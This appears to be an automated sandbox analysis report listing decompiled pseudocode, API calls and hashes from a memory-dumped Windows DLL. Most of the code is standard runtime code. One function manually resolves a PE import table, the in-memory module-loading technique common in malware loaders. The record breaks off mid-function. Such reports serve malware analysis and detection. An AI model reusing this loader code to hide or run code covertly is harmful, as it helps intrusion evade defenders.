                                          • Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                          				void* _t7;
                                          				void* _t8;
                                          				intOrPtr* _t9;
                                          				intOrPtr* _t12;
                                          				void* _t20;
                                          				long _t31;
                                          
                                          				if(_a4 != 0) {
                                          					_t31 = _a8;
                                          					if(_t31 != 0) {
                                          						_push(__ebx);
                                          						while(_t31 <= 0xffffffe0) {
                                          							if(_t31 == 0) {
                                          								_t31 = _t31 + 1;
                                          							}
                                          							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
                                          							_t20 = _t7;
                                          							if(_t20 != 0) {
                                          								L17:
                                          								_t8 = _t20;
                                          							} else {
                                          								if( *0x10013c2c == _t7) {
                                          									_t9 = E10005EC6();
                                          									 *_t9 = E10005ED9(GetLastError());
                                          									goto L17;
                                          								} else {
                                          									if(E10009026(_t7, _t31) == 0) {
                                          										_t12 = E10005EC6();
                                          										 *_t12 = E10005ED9(GetLastError());
                                          										L12:
                                          										_t8 = 0;
                                          									} else {
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          							goto L14;
                                          						}
                                          						E10009026(_t6, _t31);
                                          						 *((intOrPtr*)(E10005EC6())) = 0xc;
                                          						goto L12;
                                          					} else {
                                          						E10004732(_a4);
                                          						_t8 = 0;
                                          					}
                                          					L14:
                                          					return _t8;
                                          				} else {
                                          					return E10008E67(__ebx, __edx, __edi, _a8);
                                          				}
                                          			}










                                          APIs
                                          • _malloc.LIBCMT ref: 1000B3A7
                                            • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                            • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                            • Part of subcall function 10008E67: HeapAlloc.KERNEL32(001F0000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                          • _free.LIBCMT ref: 1000B3BA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AllocHeap_free_malloc
                                          • String ID:
                                          • API String ID: 2734353464-0
                                          • Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                          • Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
                                          • Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                          • Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				LONG* _t20;
                                          				signed int _t25;
                                          				void* _t29;
                                          				void* _t31;
                                          				LONG* _t33;
                                          				void* _t34;
                                          
                                          				_t29 = __edx;
                                          				_t24 = __ebx;
                                          				_push(0xc);
                                          				_push(0x10010da8);
                                          				E10008040(__ebx, __edi, __esi);
                                          				_t31 = E10006087();
                                          				_t25 =  *0x10012ae4; // 0xfffffffe
                                          				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                          					E100091AB(0xd);
                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                          					_t33 =  *(_t31 + 0x68);
                                          					 *(_t34 - 0x1c) = _t33;
                                          					__eflags = _t33 -  *0x10012394; // 0x10012690
                                          					if(__eflags != 0) {
                                          						__eflags = _t33;
                                          						if(__eflags != 0) {
                                          							__eflags = InterlockedDecrement(_t33);
                                          							if(__eflags == 0) {
                                          								__eflags = _t33 - 0x10012690;
                                          								if(__eflags != 0) {
                                          									E10004732(_t33);
                                          								}
                                          							}
                                          						}
                                          						_t20 =  *0x10012394; // 0x10012690
                                          						 *(_t31 + 0x68) = _t20;
                                          						_t33 =  *0x10012394; // 0x10012690
                                          						 *(_t34 - 0x1c) = _t33;
                                          						InterlockedIncrement(_t33);
                                          					}
                                          					 *(_t34 - 4) = 0xfffffffe;
                                          					E100088D8();
                                          				} else {
                                          					_t33 =  *(_t31 + 0x68);
                                          				}
                                          				_t38 = _t33;
                                          				if(_t33 == 0) {
                                          					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
                                          				}
                                          				return E10008085(_t33);
                                          			}










                                          APIs
                                            • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                            • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                          • __amsg_exit.LIBCMT ref: 10008869
                                          • __lock.LIBCMT ref: 10008879
                                          • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                          • _free.LIBCMT ref: 100088A9
                                          • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 1231874560-0
                                          • Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                          • Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
                                          • Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                          • Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E10001470(void* __ecx, intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t44;
                                          				signed short _t56;
                                          				signed int _t58;
                                          				intOrPtr _t60;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr _t70;
                                          				void _t71;
                                          				signed short* _t72;
                                          				intOrPtr _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr* _t78;
                                          				intOrPtr _t79;
                                          				intOrPtr _t80;
                                          				signed short* _t82;
                                          				void* _t84;
                                          				void* _t85;
                                          
                                          				_t78 = _a4;
                                          				_t65 =  *_t78;
                                          				_t2 = _t78 + 4; // 0x4d8d5010
                                          				_t79 =  *_t2;
                                          				_a4 = _t79;
                                          				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
                                          					L22:
                                          					return 1;
                                          				} else {
                                          					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
                                          					_v12 = _t67;
                                          					if(IsBadReadPtr(_t67, 0x14) == 0) {
                                          						while(1) {
                                          							_t44 =  *((intOrPtr*)(_t67 + 0xc));
                                          							if(_t44 == 0) {
                                          								goto L22;
                                          							}
                                          							_t8 = _t78 + 0x28; // 0x12f7805
                                          							_t9 = _t78 + 0x1c; // 0xe58b0000
                                          							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
                                          							_t85 = _t84 + 8;
                                          							_v8 = _t80;
                                          							if(_t80 == 0) {
                                          								SetLastError(0x7e);
                                          								return 0;
                                          							} else {
                                          								_t11 = _t78 + 0xc; // 0xd0ff0000
                                          								_t14 = _t78 + 8; // 0x637e8ef
                                          								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
                                          								_t84 = _t85 + 8;
                                          								if(_t70 == 0) {
                                          									_t40 = _t78 + 0x28; // 0x12f7805
                                          									_t41 = _t78 + 0x24; // 0x39c033cc
                                          									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
                                          									SetLastError(0xe);
                                          									return 0;
                                          								} else {
                                          									_t15 = _t78 + 0xc; // 0xd0ff0000
                                          									 *((intOrPtr*)(_t78 + 8)) = _t70;
                                          									_t77 = _t80;
                                          									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
                                          									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                                          									_t71 =  *_t67;
                                          									if(_t71 == 0) {
                                          										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
                                          										_t72 = _t82;
                                          									} else {
                                          										_t64 = _a4;
                                          										_t82 = _t71 + _t64;
                                          										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
                                          									}
                                          									_t56 =  *_t82;
                                          									if(_t56 == 0) {
                                          										L17:
                                          										_t67 = _t67 + 0x14;
                                          										_v12 = _t67;
                                          										if(IsBadReadPtr(_t67, 0x14) != 0) {
                                          											goto L22;
                                          										} else {
                                          											_t79 = _a4;
                                          											continue;
                                          										}
                                          									} else {
                                          										_t73 = _t72 - _t82;
                                          										_v16 = _t73;
                                          										while(1) {
                                          											_t27 = _t78 + 0x28; // 0x12f7805
                                          											_push( *_t27);
                                          											_t68 = _t73 + _t82;
                                          											if(_t56 >= 0) {
                                          												_t58 = _t56 + _a4 + 2;
                                          											} else {
                                          												_t58 = _t56 & 0x0000ffff;
                                          											}
                                          											_t30 = _t78 + 0x20; // 0xccccc35d
                                          											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
                                          											_t84 = _t84 + 0xc;
                                          											 *_t68 = _t60;
                                          											if(_t60 == 0) {
                                          												break;
                                          											}
                                          											_t56 = _t82[2];
                                          											_t73 = _v16;
                                          											_t77 = _v8;
                                          											_t82 =  &(_t82[2]);
                                          											if(_t56 != 0) {
                                          												continue;
                                          											} else {
                                          												_t67 = _v12;
                                          												goto L17;
                                          											}
                                          											goto L23;
                                          										}
                                          										_t37 = _t78 + 0x28; // 0x12f7805
                                          										_t39 = _t78 + 0x24; // 0x39c033cc
                                          										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
                                          										SetLastError(0x7f);
                                          										return 0;
                                          									}
                                          								}
                                          							}
                                          							goto L23;
                                          						}
                                          					}
                                          					goto L22;
                                          				}
                                          				L23:
                                          			}


























                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                            • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                          • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                          • SetLastError.KERNEL32(0000007F), ref: 10001596
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ErrorLast$Read$QueryVirtual
                                          • String ID:
                                          • API String ID: 4108280708-0
                                          • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                          • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                          • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                          • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				int _v20;
                                          				int _t35;
                                          				int _t38;
                                          				int _t42;
                                          				intOrPtr* _t44;
                                          				int _t47;
                                          				short* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t54;
                                          				int _t55;
                                          				int _t59;
                                          				char* _t62;
                                          
                                          				_t62 = _a8;
                                          				if(_t62 == 0) {
                                          					L5:
                                          					return 0;
                                          				}
                                          				_t50 = _a12;
                                          				if(_t50 == 0) {
                                          					goto L5;
                                          				}
                                          				if( *_t62 != 0) {
                                          					E1000476A( &_v20, _a16);
                                          					_t35 = _v20;
                                          					__eflags =  *(_t35 + 0xa8);
                                          					if( *(_t35 + 0xa8) != 0) {
                                          						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
                                          						__eflags = _t38;
                                          						if(_t38 == 0) {
                                          							__eflags = _a4;
                                          							_t59 = 1;
                                          							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                          							__eflags = _t42;
                                          							if(_t42 != 0) {
                                          								L21:
                                          								__eflags = _v8;
                                          								if(_v8 != 0) {
                                          									_t54 = _v12;
                                          									_t31 = _t54 + 0x70;
                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                          									__eflags =  *_t31;
                                          								}
                                          								return _t59;
                                          							}
                                          							L20:
                                          							_t44 = E10005EC6();
                                          							_t59 = _t59 | 0xffffffff;
                                          							__eflags = _t59;
                                          							 *_t44 = 0x2a;
                                          							goto L21;
                                          						}
                                          						_t59 = _v20;
                                          						__eflags =  *(_t59 + 0x74) - 1;
                                          						if( *(_t59 + 0x74) <= 1) {
                                          							L15:
                                          							__eflags = _t50 -  *(_t59 + 0x74);
                                          							L16:
                                          							if(__eflags < 0) {
                                          								goto L20;
                                          							}
                                          							__eflags = _t62[1];
                                          							if(_t62[1] == 0) {
                                          								goto L20;
                                          							}
                                          							L18:
                                          							_t59 =  *(_t59 + 0x74);
                                          							goto L21;
                                          						}
                                          						__eflags = _t50 -  *(_t59 + 0x74);
                                          						if(__eflags < 0) {
                                          							goto L16;
                                          						}
                                          						__eflags = _a4;
                                          						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                          						_t59 = _v20;
                                          						__eflags = _t47;
                                          						if(_t47 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L15;
                                          					}
                                          					_t55 = _a4;
                                          					__eflags = _t55;
                                          					if(_t55 != 0) {
                                          						 *_t55 =  *_t62 & 0x000000ff;
                                          					}
                                          					_t59 = 1;
                                          					goto L21;
                                          				}
                                          				_t49 = _a4;
                                          				if(_t49 != 0) {
                                          					 *_t49 = 0;
                                          				}
                                          				goto L5;
                                          			}

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                          • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                          • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                          • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                          • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				void* __edi;
                                          				void* __ebp;
                                          				void* _t25;
                                          				void* _t28;
                                          				intOrPtr _t29;
                                          				void* _t30;
                                          				intOrPtr* _t31;
                                          				void* _t33;
                                          
                                          				_t30 = __esi;
                                          				_t27 = __ebx;
                                          				_t35 = _a28;
                                          				_t29 = _a8;
                                          				if(_a28 != 0) {
                                          					_push(_a28);
                                          					_push(_a24);
                                          					_push(_t29);
                                          					_push(_a4);
                                          					E10006C38(__ebx, _t29, __esi, _t35);
                                          					_t33 = _t33 + 0x10;
                                          				}
                                          				_t36 = _a40;
                                          				_push(_a4);
                                          				if(_a40 != 0) {
                                          					_push(_a40);
                                          				} else {
                                          					_push(_t29);
                                          				}
                                          				E100042B0(_t28);
                                          				_push(_t30);
                                          				_t31 = _a32;
                                          				_push( *_t31);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_t29);
                                          				E10006E99(_t27, _t31, _t36);
                                          				_push(0x100);
                                          				_push(_a36);
                                          				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                          				_push( *((intOrPtr*)(_a24 + 0xc)));
                                          				_push(_a20);
                                          				_push(_a12);
                                          				_push(_t29);
                                          				_push(_a4);
                                          				_t25 = E10006402(_t27, _t29, _t31, _t36);
                                          				if(_t25 != 0) {
                                          					E10004280(_t25, _t29);
                                          					return _t25;
                                          				}
                                          				return _t25;
                                          			}

                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 10006627
                                            • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                          • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                          • ___FrameUnwindToState.LIBCMT ref: 10006650
                                          • CallCatchBlock.LIBCMT ref: 10006674
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                          • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                          • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                          • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E10003850(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                          				intOrPtr _v0;
                                          				void* _v808;
                                          				int _t9;
                                          				intOrPtr _t14;
                                          				signed int _t15;
                                          				signed int _t17;
                                          				signed int _t19;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          				intOrPtr _t25;
                                          				intOrPtr _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t32;
                                          				void* _t35;
                                          
                                          				_t28 = __esi;
                                          				_t27 = __edi;
                                          				_t26 = __edx;
                                          				_t23 = __ecx;
                                          				_t22 = __ebx;
                                          				_t35 = _t23 -  *0x10012158; // 0x8bc2c1c1
                                          				if(_t35 == 0) {
                                          					asm("repe ret");
                                          				}
                                          				_t30 = _t32;
                                          				_t9 = IsProcessorFeaturePresent(0x17);
                                          				if(_t9 != 0) {
                                          					_t23 = 2;
                                          					asm("int 0x29");
                                          				}
                                          				 *0x10013090 = _t9;
                                          				 *0x1001308c = _t23;
                                          				 *0x10013088 = _t26;
                                          				 *0x10013084 = _t22;
                                          				 *0x10013080 = _t28;
                                          				 *0x1001307c = _t27;
                                          				 *0x100130a8 = ss;
                                          				 *0x1001309c = cs;
                                          				 *0x10013078 = ds;
                                          				 *0x10013074 = es;
                                          				 *0x10013070 = fs;
                                          				 *0x1001306c = gs;
                                          				asm("pushfd");
                                          				_pop( *0x100130a0);
                                          				 *0x10013094 =  *_t30;
                                          				 *0x10013098 = _v0;
                                          				 *0x100130a4 =  &_a4;
                                          				 *0x10012fe0 = 0x10001;
                                          				_t14 =  *0x10013098; // 0x0
                                          				 *0x10012f9c = _t14;
                                          				 *0x10012f90 = 0xc0000409;
                                          				 *0x10012f94 = 1;
                                          				 *0x10012fa0 = 1;
                                          				_t15 = 4;
                                          				 *((intOrPtr*)(0x10012fa4 + _t15 * 0)) = 2;
                                          				_t17 = 4;
                                          				_t24 =  *0x10012158; // 0x8bc2c1c1
                                          				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                          				_t19 = 4;
                                          				_t25 =  *0x1001215c; // 0x743d3e3e
                                          				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                          				return E10004B24(_t19 << 0, 0x1000e478);
                                          			}

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32 ref: 10004B6C
                                          • ___raise_securityfailure.LIBCMT ref: 10004C53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: >>=tT
                                          • API String ID: 3761405300-2312331387
                                          • Opcode ID: 1c23e9b23445cc868b92f1be3282b246f2d7a56e7b7291d55cb854e56c3593aa
                                          • Instruction ID: 5596601be5ca5cb93711aa550495a421ea5fee831cd5595aa2954f187b284eac
                                          • Opcode Fuzzy Hash: 1c23e9b23445cc868b92f1be3282b246f2d7a56e7b7291d55cb854e56c3593aa
                                          • Instruction Fuzzy Hash: 1A21B3B4500224EEFB06CF24E9E6B447BE4FB4C354F11C16EEA089B3A5D7B0D5958B04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                          • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,8BC2C1C1), ref: 100032E3
                                          Strings
                                          • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FileFromModuleNameString
                                          • String ID: Recipe (.recipe) Property Handler
                                          • API String ID: 1402647516-129706424
                                          • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                          • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                          • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                          • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E10001980(void* _a4) {
                                          				void* _t15;
                                          				void* _t16;
                                          				void* _t20;
                                          				intOrPtr _t23;
                                          				void* _t30;
                                          				signed int _t32;
                                          				void* _t34;
                                          				void* _t35;
                                          
                                          				_t34 = _a4;
                                          				if(_t34 == 0) {
                                          					return _t15;
                                          				}
                                          				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
                                          					_t30 =  *(_t34 + 4);
                                          					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
                                          				}
                                          				if( *(_t34 + 8) == 0) {
                                          					L10:
                                          					_t16 =  *(_t34 + 4);
                                          					if(_t16 != 0) {
                                          						VirtualFree(_t16, 0, 0x8000);
                                          					}
                                          					return HeapFree(GetProcessHeap(), 0, _t34);
                                          				} else {
                                          					_t32 = 0;
                                          					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
                                          						L8:
                                          						_t20 =  *(_t34 + 8);
                                          						if(_t20 != 0) {
                                          							VirtualFree(_t20, 0, 0x8000);
                                          						}
                                          						goto L10;
                                          					} else {
                                          						goto L5;
                                          					}
                                          					do {
                                          						L5:
                                          						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
                                          						if(_t23 != 0) {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
                                          							_t35 = _t35 + 8;
                                          						}
                                          						_t32 = _t32 + 1;
                                          					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
                                          					goto L8;
                                          				}
                                          			}












                                          APIs
                                          • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                          • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                          • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                          • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Free$HeapVirtual$Process
                                          • String ID:
                                          • API String ID: 3505259878-0
                                          • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                          • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                          • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                          • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
